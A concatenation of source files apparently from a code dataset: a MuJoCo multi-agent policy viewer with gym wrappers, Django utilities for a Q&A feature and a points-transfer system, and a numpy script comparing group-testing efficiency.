self.obs = np.array(self.obs).astype(np.float32)
self.share_obs = np.array(self.share_obs).astype(np.float32)
self.recurrent_hidden_states = np.zeros((1, self.num_agents, 64)).astype(np.float32)
self.recurrent_hidden_states_critic = np.zeros((1, self.num_agents, 64)).astype(np.float32)
#for policy in self.policies:
# policy.reset()
if hasattr(self.env, "reset_goal"):
self.goal = self.env.reset_goal()
self.update_sim(self.env.unwrapped.sim)
class PolicyViewer_bc(MjViewer):
'''
PolicyViewer runs a policy with an environment and optionally displays it.
env - environment to run policy in
policy - policy object to run
display_window - if true, show the graphical viewer
seed - environment seed to view
duration - time in seconds to run the policy, run forever if duration=None
'''
@store_args
def __init__(self, env, policies, display_window=True, seed=None, duration=None):
if seed is None:
self.seed = env.seed()[0]
else:
self.seed = seed
env.seed(seed)
self.total_rew = 0.0
self.dict_obs = env.reset()
#for policy in self.policies:
# policy.reset()
#assert env.metadata['n_actors'] % len(policies) == 0
if hasattr(env, "reset_goal"):
self.goal = env.reset_goal()
super().__init__(self.env.unwrapped.sim)
# TO DO: remove circular dependency on viewer object. It looks fishy.
self.env.unwrapped.viewer = self
if self.render and self.display_window:
self.env.render()
def key_callback(self, window, key, scancode, action, mods):
super().key_callback(window, key, scancode, action, mods)
# Trigger on keyup only:
if action != glfw.RELEASE:
return
# Increment experiment seed
if key == glfw.KEY_N:
self.reset_increment()
# Decrement experiment trial
elif key == glfw.KEY_P:
print("Pressed P")
self.seed = max(self.seed - 1, 0)
self.env.seed(self.seed)
self.ob = self.env.reset()
for policy in self.policies:
policy.reset()
if hasattr(self.env, "reset_goal"):
self.goal = self.env.reset_goal()
self.update_sim(self.env.unwrapped.sim)
def run(self):
self.action_movement_dim = []
'''
self.order_obs = ['agent_qpos_qvel','box_obs','ramp_obs','food_obs','observation_self']
self.mask_order_obs = ['mask_aa_obs','mask_ab_obs','mask_ar_obs','mask_af_obs',None]
'''
'''
self.order_obs = ['box_obs','ramp_obs','construction_site_obs','vector_door_obs', 'observation_self']
self.mask_order_obs = [None,'mask_ar_obs',None,None,None]
'''
self.order_obs = ['agent_qpos_qvel','box_obs','ramp_obs','construction_site_obs','vector_door_obs', 'observation_self']
self.mask_order_obs = [None,None,'mask_ar_obs',None,None,None]
self.num_agents = 2
for agent_id in range(self.num_agents):
action_movement = self.env.action_space['action_movement'][agent_id].nvec
self.action_movement_dim.append(len(action_movement))
self.masks = np.ones((1, self.num_agents, 1)).astype(np.float32)
if self.duration is not None:
self.end_time = time.time() + self.duration
self.total_rew_avg = 0.0
self.n_episodes = 0
self.obs = []
self.share_obs = []
for i, key in enumerate(self.order_obs):
if key in self.env.observation_space.spaces.keys():
                if self.mask_order_obs[i] is None:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_obs = temp_share_obs.copy()
else:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_mask = self.dict_obs[self.mask_order_obs[i]].copy()
temp_obs = self.dict_obs[key].copy()
mins_temp_mask = ~temp_mask
temp_obs[mins_temp_mask]=np.zeros(((mins_temp_mask).sum(),temp_obs.shape[2]))
temp_obs = temp_obs.reshape(self.num_agents,-1)
if i == 0:
reshape_obs = temp_obs.copy()
reshape_share_obs = temp_share_obs.copy()
else:
reshape_obs = np.concatenate((reshape_obs,temp_obs),axis=1)
reshape_share_obs = np.concatenate((reshape_share_obs,temp_share_obs),axis=1)
self.obs.append(reshape_obs)
self.share_obs.append(reshape_share_obs)
self.obs = np.array(self.obs).astype(np.float32)
self.share_obs = np.array(self.share_obs).astype(np.float32)
self.recurrent_hidden_states = np.zeros((1, self.num_agents, 64)).astype(np.float32)
self.recurrent_hidden_states_critic = np.zeros((1, self.num_agents, 64)).astype(np.float32)
while self.duration is None or time.time() < self.end_time:
values = []
actions= []
recurrent_hidden_statess = []
recurrent_hidden_statess_critic = []
with torch.no_grad():
for agent_id in range(self.num_agents):
self.policies[0].eval()
value, action, action_log_prob, recurrent_hidden_states, recurrent_hidden_states_critic = self.policies[0].act(agent_id,
torch.tensor(self.share_obs[:,agent_id,:]),
torch.tensor(self.obs[:,agent_id,:]),
torch.tensor(self.recurrent_hidden_states[:,agent_id,:]),
torch.tensor(self.recurrent_hidden_states_critic[:,agent_id,:]),
torch.tensor(self.masks[:,agent_id,:]))
values.append(value.detach().cpu().numpy())
actions.append(action.detach().cpu().numpy())
recurrent_hidden_statess.append(recurrent_hidden_states.detach().cpu().numpy())
recurrent_hidden_statess_critic.append(recurrent_hidden_states_critic.detach().cpu().numpy())
action_movement = []
action_pull = []
action_glueall = []
for agent_id in range(self.num_agents):
action_movement.append(actions[agent_id][0][:self.action_movement_dim[agent_id]])
action_glueall.append(int(actions[agent_id][0][self.action_movement_dim[agent_id]]))
if 'action_pull' in self.env.action_space.spaces.keys():
action_pull.append(int(actions[agent_id][0][-1]))
action_movement = np.stack(action_movement, axis = 0)
action_glueall = np.stack(action_glueall, axis = 0)
if 'action_pull' in self.env.action_space.spaces.keys():
action_pull = np.stack(action_pull, axis = 0)
one_env_action = {'action_movement': action_movement, 'action_pull': action_pull, 'action_glueall': action_glueall}
self.dict_obs, rew, done, env_info = self.env.step(one_env_action)
#print(self.dict_obs)
self.total_rew += rew
self.obs = []
self.share_obs = []
for i, key in enumerate(self.order_obs):
if key in self.env.observation_space.spaces.keys():
                    if self.mask_order_obs[i] is None:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_obs = temp_share_obs.copy()
else:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_mask = self.dict_obs[self.mask_order_obs[i]].copy()
temp_obs = self.dict_obs[key].copy()
mins_temp_mask = ~temp_mask
temp_obs[mins_temp_mask]=np.zeros(((mins_temp_mask).sum(),temp_obs.shape[2]))
temp_obs = temp_obs.reshape(self.num_agents,-1)
if i == 0:
reshape_obs = temp_obs.copy()
reshape_share_obs = temp_share_obs.copy()
else:
reshape_obs = np.concatenate((reshape_obs,temp_obs),axis=1)
reshape_share_obs = np.concatenate((reshape_share_obs,temp_share_obs),axis=1)
self.obs.append(reshape_obs)
self.share_obs.append(reshape_share_obs)
self.obs = np.array(self.obs).astype(np.float32)
self.share_obs = np.array(self.share_obs).astype(np.float32)
self.recurrent_hidden_states = np.array(recurrent_hidden_statess).transpose(1,0,2)
self.recurrent_hidden_states_critic = np.array(recurrent_hidden_statess_critic).transpose(1,0,2)
if done or env_info.get('discard_episode', False):
self.reset_increment()
if self.display_window:
self.add_overlay(const.GRID_TOPRIGHT, "Reset env; (current seed: {})".format(self.seed), "N - next / P - previous ")
self.add_overlay(const.GRID_TOPRIGHT, "Reward", str(self.total_rew))
if hasattr(self.env.unwrapped, "viewer_stats"):
for k, v in self.env.unwrapped.viewer_stats.items():
self.add_overlay(const.GRID_TOPRIGHT, k, str(v))
self.env.render()
def reset_increment(self):
self.total_rew_avg = (self.n_episodes * self.total_rew_avg + self.total_rew) / (self.n_episodes + 1)
self.n_episodes += 1
print(f"Reward: {self.total_rew} (rolling average: {self.total_rew_avg})")
self.total_rew = 0.0
self.seed += 1
self.env.seed(self.seed)
self.dict_obs = self.env.reset()
self.obs = []
self.share_obs = []
for i, key in enumerate(self.order_obs):
if key in self.env.observation_space.spaces.keys():
                if self.mask_order_obs[i] is None:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_obs = temp_share_obs.copy()
else:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_mask = self.dict_obs[self.mask_order_obs[i]].copy()
temp_obs = self.dict_obs[key].copy()
mins_temp_mask = ~temp_mask
temp_obs[mins_temp_mask]=np.zeros(((mins_temp_mask).sum(),temp_obs.shape[2]))
temp_obs = temp_obs.reshape(self.num_agents,-1)
if i == 0:
reshape_obs = temp_obs.copy()
reshape_share_obs = temp_share_obs.copy()
else:
reshape_obs = np.concatenate((reshape_obs,temp_obs),axis=1)
reshape_share_obs = np.concatenate((reshape_share_obs,temp_share_obs),axis=1)
self.obs.append(reshape_obs)
self.share_obs.append(reshape_share_obs)
self.obs = np.array(self.obs).astype(np.float32)
self.share_obs = np.array(self.share_obs).astype(np.float32)
self.recurrent_hidden_states = np.zeros((1, self.num_agents, 64)).astype(np.float32)
self.recurrent_hidden_states_critic = np.zeros((1, self.num_agents, 64)).astype(np.float32)
#for policy in self.policies:
# policy.reset()
if hasattr(self.env, "reset_goal"):
self.goal = self.env.reset_goal()
self.update_sim(self.env.unwrapped.sim)
```
#### File: hns/wrappers/util.py
```python
import gym
from mujoco_py import MujocoException
from gym.spaces import Dict, Box
import numpy as np
from copy import deepcopy
import logging
def update_obs_space(env, delta):
spaces = env.observation_space.spaces.copy()
for key, shape in delta.items():
spaces[key] = Box(-np.inf, np.inf, shape, np.float32)
return Dict(spaces)
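# A minimal usage sketch (hypothetical key and shape, not from this repo): a wrapper
# that adds a new (n_agents, 3) observation would declare it in its __init__ as:
#   self.observation_space = update_obs_space(env, {'new_key': (n_agents, 3)})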
class NumpyArrayRewardWrapper(gym.RewardWrapper):
"""
Convenience wrapper that casts rewards to the multiagent format
(numpy array of shape (n_agents,))
"""
def __init__(self, env):
super().__init__(env)
def reward(self, rew):
return np.zeros((self.unwrapped.n_agents,)) + rew
class DiscretizeActionWrapper(gym.ActionWrapper):
'''
Take a Box action and convert it to a MultiDiscrete Action through quantization
Args:
action_key: (string) action to discretize
nbuckets: (int) number of discrete actions per dimension. It should be odd such
that actions centered around 0 will have the middle action be 0.
'''
def __init__(self, env, action_key, nbuckets=11):
super().__init__(env)
self.action_key = action_key
self.discrete_to_continuous_act_map = []
for i, ac_space in enumerate(self.action_space.spaces[action_key].spaces):
assert isinstance(ac_space, Box)
action_map = np.array([np.linspace(low, high, nbuckets)
for low, high in zip(ac_space.low, ac_space.high)])
_nbuckets = np.ones((len(action_map))) * nbuckets
self.action_space.spaces[action_key].spaces[i] = gym.spaces.MultiDiscrete(_nbuckets)
self.discrete_to_continuous_act_map.append(action_map)
self.discrete_to_continuous_act_map = np.array(self.discrete_to_continuous_act_map)
def action(self, action):
action = deepcopy(action)
ac = action[self.action_key]
# helper variables for indexing the discrete-to-continuous action map
agent_idxs = np.tile(np.arange(ac.shape[0])[:, None], ac.shape[1])
ac_idxs = np.tile(np.arange(ac.shape[1]), ac.shape[0]).reshape(ac.shape)
action[self.action_key] = self.discrete_to_continuous_act_map[agent_idxs, ac_idxs, ac]
return action
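# Illustrative example of the quantization above (values are assumptions, not taken
# from this repo's configs): a Box dimension with low=-1, high=1 and nbuckets=11 maps
# discrete action k to np.linspace(-1, 1, 11)[k], so the middle bucket k=5 is exactly 0.0.
#   env = DiscretizeActionWrapper(env, 'action_movement', nbuckets=11)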
class DiscardMujocoExceptionEpisodes(gym.Wrapper):
    '''
    Catches MuJoCo exceptions and signals that the episode should be discarded.
    '''
def __init__(self, env, n_agents):
super().__init__(env)
self.episode_error = False
self.n_agents = n_agents
def step(self, action):
assert not self.episode_error, "Won't Continue Episode After Mujoco Exception -- \
Please discard episode and reset. If info['discard_episode'] is True the episode\
should be discarded"
try:
obs, rew, done, info = self.env.step(action)
info['discard_episode'] = False
except MujocoException as e:
self.episode_error = True
            # done is returned as True together with info['discard_episode'] = True so
            # that callers drop this episode instead of treating it as valid data.
            print("MuJoCo exception encountered, discarding episode.")
obs, rew, done, info = {}, np.zeros(self.n_agents), True, {'discard_episode': True}
logging.info(str(e))
logging.info("Encountered Mujoco Exception During Environment Step.\
Reset Episode Required")
return obs, rew, done, info
def reset(self):
try:
obs = self.env.reset()
except MujocoException:
logging.info("Encountered Mujoco Exception During Environment Reset.\
Trying Reset Again")
obs = self.reset()
self.episode_error = False
return obs
class MaskActionWrapper(gym.Wrapper):
'''
For a boolean action, sets it to zero given a mask from the previous step.
    For example, you could mask the grab action based on whether the agent can see the box.
Args:
action_key (string): key in action dictionary to be masked
mask_keys (string): keys in observation dictionary with which to mask. The shape
of the concatenation of the masks (along the 1st dimension) should exactly
match that of action_key
'''
def __init__(self, env, action_key, mask_keys):
super().__init__(env)
self.action_key = action_key
self.mask_keys = mask_keys
def reset(self):
self.prev_obs = self.env.reset()
return deepcopy(self.prev_obs)
def step(self, action):
#import pdb; pdb.set_trace()
mask = np.concatenate([self.prev_obs[k] for k in self.mask_keys], -1)
action[self.action_key] = np.logical_and(action[self.action_key], mask)
self.prev_obs, rew, done, info = self.env.step(action)
return deepcopy(self.prev_obs), rew, done, info
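# Usage sketch (the keys are assumptions borrowed from elsewhere in this codebase):
# zero out the pull action for boxes the agent could not see on the previous step.
#   env = MaskActionWrapper(env, action_key='action_pull', mask_keys=['mask_ab_obs'])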
class AddConstantObservationsWrapper(gym.ObservationWrapper):
'''
Adds new constant observations to the environment.
Args:
new_obs: Dictionary with the new observations.
'''
def __init__(self, env, new_obs):
super().__init__(env)
self.new_obs = new_obs
for obs_key in self.new_obs:
assert obs_key not in self.observation_space.spaces, (
f'Observation key {obs_key} exists in original observation space')
if type(self.new_obs[obs_key]) in [list, tuple]:
self.new_obs[obs_key] = np.array(self.new_obs[obs_key])
shape = self.new_obs[obs_key].shape
self.observation_space = update_obs_space(self, {obs_key: shape})
def observation(self, obs):
for key, val in self.new_obs.items():
obs[key] = val
return obs
class SpoofEntityWrapper(gym.ObservationWrapper):
'''
Add extra entities along entity dimension such that shapes can match between
environments with differing number of entities. This is meant to be used
after SplitObservations and SelectKeysWrapper. This will also add masks that are
    1 except along the new columns (which can be used by a fully observed value function).
Args:
total_n_entities (int): total number of entities after spoofing (including spoofed ones)
keys (list): observation keys with which to add entities along the second dimension
mask_keys (list): mask keys with which to add columns.
'''
def __init__(self, env, total_n_entities, keys, mask_keys):
super().__init__(env)
self.total_n_entities = total_n_entities
self.keys = keys
self.mask_keys = mask_keys
for key in self.keys + self.mask_keys:
shape = list(self.observation_space.spaces[key].shape)
shape[1] = total_n_entities
self.observation_space = update_obs_space(self, {key: shape})
for key in self.mask_keys:
shape = list(self.observation_space.spaces[key].shape)
self.observation_space = update_obs_space(self, {key + '_spoof': shape})
def observation(self, obs):
for key in self.keys:
n_to_spoof = self.total_n_entities - obs[key].shape[1]
if n_to_spoof > 0:
obs[key] = np.concatenate([obs[key], np.zeros((obs[key].shape[0], n_to_spoof, obs[key].shape[-1]))], 1)
for key in self.mask_keys:
n_to_spoof = self.total_n_entities - obs[key].shape[1]
obs[key + '_spoof'] = np.concatenate([np.ones_like(obs[key]), np.zeros((obs[key].shape[0], n_to_spoof))], -1)
if n_to_spoof > 0:
obs[key] = np.concatenate([obs[key], np.zeros((obs[key].shape[0], n_to_spoof))], -1)
return obs
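# Usage sketch (hypothetical entity count): pad box observations up to 4 entities so
# that a policy trained with 4 boxes can run in an env with fewer, and expose
# 'mask_ab_obs_spoof' marking which columns are real.
#   env = SpoofEntityWrapper(env, total_n_entities=4, keys=['box_obs'], mask_keys=['mask_ab_obs'])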
class ConcatenateObsWrapper(gym.ObservationWrapper):
'''
Group multiple observations under the same key in the observation dictionary.
Args:
obs_groups: dict of {key_to_save: [keys to concat]}
'''
def __init__(self, env, obs_groups):
super().__init__(env)
self.obs_groups = obs_groups
for key_to_save, keys_to_concat in obs_groups.items():
assert np.all([np.array(self.observation_space.spaces[keys_to_concat[0]].shape[:-1]) ==
np.array(self.observation_space.spaces[k].shape[:-1])
for k in keys_to_concat]), \
f"Spaces were {[(k, v) for k, v in self.observation_space.spaces.items() if k in keys_to_concat]}"
new_last_dim = sum([self.observation_space.spaces[k].shape[-1] for k in keys_to_concat])
new_shape = list(self.observation_space.spaces[keys_to_concat[0]].shape[:-1]) + [new_last_dim]
self.observation_space = update_obs_space(self, {key_to_save: new_shape})
'''
def observation(self, obs):
for key_to_save, keys_to_concat in self.obs_groups.items():
for k in keys_to_concat:
if k not in obs.keys():
print(keys_to_concat)
print(obs.keys())
assert 0
obs[key_to_save] = np.concatenate([obs[k] for k in keys_to_concat], -1)
return obs
'''
def observation(self, obs):
for key_to_save, keys_to_concat in self.obs_groups.items():
temp_obs = []
for k in keys_to_concat:
if k in obs.keys():
temp_obs.append(obs[k])
if key_to_save in obs.keys():
obs[key_to_save] = np.concatenate(temp_obs, -1)
return obs
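# Usage sketch (hypothetical observation keys): store the concatenation of box position
# and box velocity observations under a single 'box_obs' key.
#   env = ConcatenateObsWrapper(env, {'box_obs': ['box_pos_obs', 'box_vel_obs']})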
``` |
{
"source": "jiayueru/YPPF",
"score": 2
} |
#### File: YPPF/app/QA_utils.py
```python
from app.utils_dependency import *
from app.models import (
NaturalPerson,
Organization,
Notification,
QandA,
)
from app.notification_utils import notification_create
from app import utils
def QA_create(sender, receiver, Q_text, anonymous_flag=False):
# sender: user
# receiver: user
    # Q_text: str, the text of the question
    # anonymous_flag: whether the question is asked anonymously
new_qa = QandA.objects.create(
sender=sender,
receiver=receiver,
Q_text=Q_text,
anonymous_flag=anonymous_flag,
)
notification_create(
receiver=receiver,
sender=sender,
typename=Notification.Type.NEEDREAD,
title="您收到了一条提问",
content="请点击本条通知的标题,进入问答中心查看我的提问!",
URL='/QAcenter/',
anonymous_flag=anonymous_flag
)
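# A minimal usage sketch (hypothetical caller and receiver, not part of this module):
#   QA_create(sender=request.user, receiver=org.organization_id,
#             Q_text="What is the schedule?", anonymous_flag=True)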
def QA_anwser(QA_id, A_text):
with transaction.atomic():
qa = QandA.objects.select_for_update().get(id=QA_id)
qa.A_text = A_text
qa.save()
notification_create(
receiver=qa.sender,
sender=qa.receiver,
typename=Notification.Type.NEEDREAD,
title="您收到了一条回答",
content=A_text,
URL='/QAcenter/',
)
def QA_ignore(QA_id, sender_flag=True):
with transaction.atomic():
qa = QandA.objects.select_for_update().get(id=QA_id)
        # if both sides have ignored it, mark the record as deleted
if sender_flag:
qa.status = QandA.Status.DELETE if qa.status == QandA.Status.IGNORE_RECEIVER else QandA.Status.IGNORE_SENDER
else:
qa.status = QandA.Status.DELETE if qa.status == QandA.Status.IGNORE_SENDER else QandA.Status.IGNORE_RECEIVER
qa.save()
def QA_delete(QA_id):
with transaction.atomic():
qa = QandA.objects.select_for_update().get(id=QA_id)
qa.status = QandA.Status.DELETE
qa.save()
def QA2Display(user):
all_instances = dict()
all_instances['send'], all_instances['receive'] = [], []
instances = {
"send": QandA.objects.activated(sender_flag=True).select_related('receiver').filter(sender=user).order_by("-Q_time"),
"receive": QandA.objects.activated(receiver_flag=True).select_related('sender').filter(receiver=user).order_by("-Q_time"),
}
me = NaturalPerson.objects.get(person_id=user) if hasattr(user, 'naturalperson') \
else Organization.objects.get(organization_id=user)
my_name = me.name if hasattr(user, "naturalperson") else me.oname
receiver_userids = instances['send'].values_list('receiver_id', flat=True)
sender_userids = instances['receive'].values_list('sender_id', flat=True)
sender_persons = NaturalPerson.objects.filter(person_id__in=sender_userids).values_list('person_id', 'name')
sender_persons = {userid: name for userid, name in sender_persons}
sender_orgs = Organization.objects.filter(organization_id__in=sender_userids).values_list('organization_id', 'oname')
sender_orgs = {userid: name for userid, name in sender_orgs}
receiver_persons = NaturalPerson.objects.filter(person_id__in=receiver_userids).values_list('person_id', 'name')
receiver_persons = {userid: name for userid, name in receiver_persons}
receiver_orgs = Organization.objects.filter(organization_id__in=receiver_userids).values_list('organization_id', 'oname')
receiver_orgs = {userid: name for userid, name in receiver_orgs}
for qa in instances['send']:
send_QAs = dict()
send_QAs['sender'] = my_name
if qa.anonymous_flag:
send_QAs['sender'] += "(匿名)"
_, user_type, _ = utils.check_user_type(qa.receiver)
if user_type == "Organization":
send_QAs["receiver"] = receiver_orgs.get(qa.receiver_id)
else:
send_QAs["receiver"] = receiver_persons.get(qa.receiver_id)
send_QAs['Q_text'] = qa.Q_text
send_QAs['A_text'] = qa.A_text
send_QAs['Q_time'] = qa.Q_time
send_QAs['A_time'] = qa.A_time
send_QAs['id'] = qa.id
send_QAs['anwser_flag'] = (len(qa.A_text) != 0)
all_instances['send'].append(send_QAs)
for qa in instances['receive']:
receive_QAs = dict()
if qa.anonymous_flag:
receive_QAs['sender'] = "匿名者"
else:
_, user_type, _ = utils.check_user_type(qa.sender)
if user_type == "Organization":
receive_QAs["sender"] = sender_orgs.get(qa.sender_id)
else:
receive_QAs["sender"] = sender_persons.get(qa.sender_id)
receive_QAs['receiver'] = my_name
receive_QAs['Q_text'] = qa.Q_text
receive_QAs['A_text'] = qa.A_text
receive_QAs['Q_time'] = qa.Q_time
receive_QAs['A_time'] = qa.A_time
receive_QAs['id'] = qa.id
receive_QAs['anwser_flag'] = (len(qa.A_text) != 0)
all_instances['receive'].append(receive_QAs)
return all_instances
```
#### File: YPPF/app/YQPoint_utils.py
```python
from app.utils_dependency import *
from app.models import (
NaturalPerson,
Organization,
YQPointDistribute,
TransferRecord,
Notification,
)
from datetime import datetime, timedelta
from django.db.models import F
from app.scheduler import scheduler
__all__ = [
# 'distribute_YQPoint',
'add_YQPoints_distribute',
'confirm_transaction',
'record2Display',
]
def _distribute_YQPoint_to_users(proposer, recipients, YQPoints, trans_time):
    '''
    Summary:
        From the proposer account (an organization account by default), send a
        transfer of YQPoints to every account in recipients, and automatically
        create ACCEPTED transfer records for later lookup.
        recipients is expected to be a QuerySet that is either all natural
        persons or all organizations.
    '''
    try:
        assert proposer.YQPoint >= recipients.count() * YQPoints
    except AssertionError:
        # the proposer account does not have enough YQPoints left
        print(
            f"由{proposer}向自然人{recipients[:3]}...等{recipients.count()}个用户"
            + f"发放元气值失败,原因可能是{proposer}的元气值剩余不足"
        )
        return
try:
        is_nperson = isinstance(recipients[0], NaturalPerson)  # if not natural persons, they are organizations
except:
print("没有转账对象!")
return
    # update YQPoint balances
recipients.update(YQPoint=F('YQPoint') + YQPoints)
proposer.YQPoint -= recipients.count() * YQPoints
proposer.save()
    # create the transfer records
trans_msg = f"{proposer}向您发放了{YQPoints}元气值,请查收!"
transfer_list = [TransferRecord(
proposer=proposer.organization_id,
recipient=(recipient.person_id if is_nperson else recipient.organization_id),
amount=YQPoints,
start_time=trans_time,
finish_time=trans_time,
message=trans_msg,
status=TransferRecord.TransferStatus.ACCEPTED
) for recipient in recipients]
TransferRecord.objects.bulk_create(transfer_list)
def distribute_YQPoint(distributer):
    '''
    Call _distribute_YQPoint_to_users to distribute YQPoints to everyone.
    Based on distributer, find the recipients, call the helper to complete the
    distribution, and report the elapsed time.
    distributer should be an instance of YQPointDistribute.
    '''
trans_time = distributer.start_time
    # find the natural persons and organizations eligible to receive YQPoints
per_to_dis = NaturalPerson.objects.activated().filter(
YQPoint__lte=distributer.per_max_dis_YQP)
org_to_dis = Organization.objects.activated().filter(
YQPoint__lte=distributer.org_max_dis_YQP).exclude(oname=YQP_ONAME)
    # the college account is the proposer of the distribution
YPcollege = Organization.objects.get(oname=YQP_ONAME)
_distribute_YQPoint_to_users(proposer=YPcollege,
recipients=per_to_dis,
YQPoints=distributer.per_YQP,
trans_time=trans_time)
_distribute_YQPoint_to_users(proposer=YPcollege,
recipients=org_to_dis,
YQPoints=distributer.org_YQP,
trans_time=trans_time)
end_time = datetime.now()
diff_time = end_time - trans_time
debug_msg = (
f"已向{per_to_dis.count()}个自然人和{org_to_dis.count()}个小组转账,"
+ f"用时{diff_time.seconds}s,{diff_time.microseconds}microsecond\n"
)
print(debug_msg)
def add_YQPoints_distribute(dtype):
    '''
    Summary:
        Register the active YQPoint distribution instance of type dtype.
        Each type (temporary, weekly, biweekly) must have exactly one instance
        in effect; if a scheduled job of the same type is already running,
        registering overwrites it. Cancellation is not implemented yet.
    '''
    try:
        distributer = YQPointDistribute.objects.get(type=dtype, status=True)
    except Exception as e:
        print(f"按类型{dtype}注册任务失败,原因可能是没有状态为YES或者有多个状态为YES的发放实例\n{e}")
        return
if dtype == YQPointDistribute.DistributionType.TEMPORARY:
        # a one-off (temporary) distribution
scheduler.add_job(distribute_YQPoint,
"date",
id="temporary_YQP_distribute",
run_date=distributer.start_time,
args=[distributer])
else:
        # a recurring distribution
scheduler.add_job(distribute_YQPoint,
"interval",
id=f"{dtype}weeks_interval_YQP_distribute",
weeks=distributer.type,
next_run_time=distributer.start_time,
args=[distributer])
@log.except_captured(source='YQPoint_utils[confirm_transaction]', record_user=True)
def confirm_transaction(request, tid=None, reject=None):
    # the import structure here is awkward and could be refactored
from app.notification_utils import notification_create, notification_status_change
from app.wechat_send import publish_notification, WechatApp
context = dict()
context["warn_code"] = 1 # 先假设有问题
new_notification = None
with transaction.atomic():
try:
record = TransferRecord.objects.select_for_update().get(
id=tid, recipient=request.user
)
except Exception as e:
context["warn_message"] = "交易遇到问题, 请联系管理员!" + str(e)
return context
if record.status != TransferRecord.TransferStatus.WAITING:
context["warn_message"] = "交易已经完成, 请不要重复操作!"
return context
payer = record.proposer
try:
if hasattr(payer, "naturalperson"):
payer = (
NaturalPerson.objects.activated()
.select_for_update()
.get(person_id=payer)
)
else:
payer = Organization.objects.select_for_update().get(
organization_id=payer
)
except:
context["warn_message"] = "交易对象不存在或已毕业, 请联系管理员!"
return context
recipient = record.recipient
if hasattr(recipient, "naturalperson"):
recipient = (
NaturalPerson.objects.activated()
.select_for_update()
.get(person_id=recipient)
)
else:
recipient = Organization.objects.select_for_update().get(
organization_id=recipient
)
if reject is True:
record.status = TransferRecord.TransferStatus.REFUSED
payer.YQPoint += record.amount
payer.save()
context["warn_message"] = "拒绝转账成功!"
new_notification = notification_create(
receiver=record.proposer,
sender=record.recipient,
typename=Notification.Type.NEEDREAD,
title=Notification.Title.TRANSFER_FEEDBACK,
content=f"{str(recipient)}拒绝了您的转账。",
URL="/myYQPoint/",
)
notification_status_change(record.transfer_notification.get().id)
else:
record.status = TransferRecord.TransferStatus.ACCEPTED
recipient.YQPoint += record.amount
recipient.save()
context["warn_message"] = "交易成功!"
new_notification = notification_create(
receiver=record.proposer,
sender=record.recipient,
typename=Notification.Type.NEEDREAD,
title=Notification.Title.TRANSFER_FEEDBACK,
content=f"{str(recipient)}接受了您的转账。",
URL="/myYQPoint/",
)
notification_status_change(record.transfer_notification.get().id)
publish_notification(new_notification, app=WechatApp.TRANSFER)
        record.finish_time = datetime.now()  # time at which the transaction completed
record.save()
context["warn_code"] = 2
return context
context["warn_message"] = "交易遇到问题, 请联系管理员!"
return context
@log.except_captured(source='YQPoint_utils[record2Display]')
def record2Display(record_list, user):  # corresponds to table_show_list in the myYQPoint view
lis = []
amount = {"send": 0.0, "recv": 0.0}
    # running totals of YQPoints over all records in this list
for record in record_list:
lis.append({})
        # determine whether this record was sent or received by the user
record_type = "send" if record.proposer.username == user.username else "recv"
# id
lis[-1]["id"] = record.id
        # timestamps
lis[-1]["start_time"] = record.start_time.strftime("%Y-%m-%d %H:%M")
if record.finish_time is not None:
lis[-1]["finish_time"] = record.finish_time.strftime("%Y-%m-%d %H:%M")
        # counterparty
        # for records the user sent, the counterparty is the recipient
obj_user = record.recipient if record_type == "send" else record.proposer
lis[-1]["obj_direct"] = "To " if record_type == "send" else "From"
        if hasattr(obj_user, "naturalperson"):  # if the OneToOne field lives on the natural person
lis[-1]["obj"] = obj_user.naturalperson.name
lis[-1]["obj_url"] = "/stuinfo/?name=" + lis[-1]["obj"] + "+" + str(obj_user.id)
else:
lis[-1]["obj"] = obj_user.organization.oname
lis[-1]["obj_url"] = "/orginfo/?name=" + lis[-1]["obj"]
        # amount
lis[-1]["amount"] = record.amount
amount[record_type] += record.amount
        # message
lis[-1]["message"] = record.message
lis[-1]["if_act_url"] = False
if record.corres_act is not None:
lis[-1]["message"] = "报名活动" + record.corres_act.title
            # TODO: also add a link to the corresponding activity here
        # status
if record.status == TransferRecord.TransferStatus.PENDING:
            # PENDING is not shown to individuals; they simply see the points as already received
lis[-1]["status"] = "已接收"
else:
lis[-1]["status"] = record.get_status_display()
        # displayed to users as 1/10 of the stored value
    """
    adjusted uniformly in the frontend:
    for key in amount:
        amount[key] = amount[key]/10
    """
    # round the amounts to absorb floating point error
for key in amount.keys():
amount[key] = round(amount[key], 1)
return lis, amount
``` |
{
"source": "jiayuewan/group-testing-with-household-correlation",
"score": 2
} |
#### File: src/deprecated/counterexample.py
```python
import numpy as np
import matplotlib
import matplotlib.cm
cmap = matplotlib.cm.get_cmap().copy()
cmap.set_bad('white',np.nan)
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
theta1_list = np.linspace(0.01, 1, 100)
theta2_list = np.linspace(0.01, 1, 100)
num_grid = len(theta1_list)
n=2
alpha=0.01
num_grid = len(theta1_list)
def compute_np_beta(alpha, theta1, theta2):
return (1 - alpha * (7/12*theta2**2 + 7/12*5/12*theta2 + 5**2/12**2) \
- (1-alpha) * (7/12*theta1*theta2+5/12*theta1))
def compute_np_eta(alpha, theta1, theta2, np_beta, n=2):
denom = n * alpha * (1-np_beta)
num = n * (theta1 * 2 * alpha * (1-alpha)\
+ theta2 * alpha**2 * ((7/12)**2 + 2 * 7/12 * 5/12)\
+ alpha**2 * (5/12)**2)
return num/denom
def compute_np_efficiency(n, alpha, eta, beta):
inv_eff = 1/n + alpha * eta * (1-beta)
return 1/inv_eff
def compute_cp_efficiency(n, alpha, theta1, theta2):
cp_inv_eff = 1/n + alpha * n * (8*theta1+2*theta2)/(5*theta1+3*theta1*theta2+4*theta2**2)*(theta1*theta2/4 + theta2**2/3 + 5*theta1/12)
return 1/cp_inv_eff
def plot_diff_efficiency():
diff_eff_vals = np.empty((num_grid, num_grid))
diff_eff_vals[:] = np.nan
for i in range(num_grid):
for j in range(i, num_grid):
np_beta = compute_np_beta(alpha, theta1_list[i], theta2_list[j])
np_eta = compute_np_eta(alpha, theta1_list[i], theta2_list[j], np_beta)
np_eff = compute_np_efficiency(n, alpha, np_eta, np_beta)
cp_eff = compute_cp_efficiency(n, alpha, theta1_list[i], theta2_list[j])
diff_eff_vals[i,j] = cp_eff - np_eff
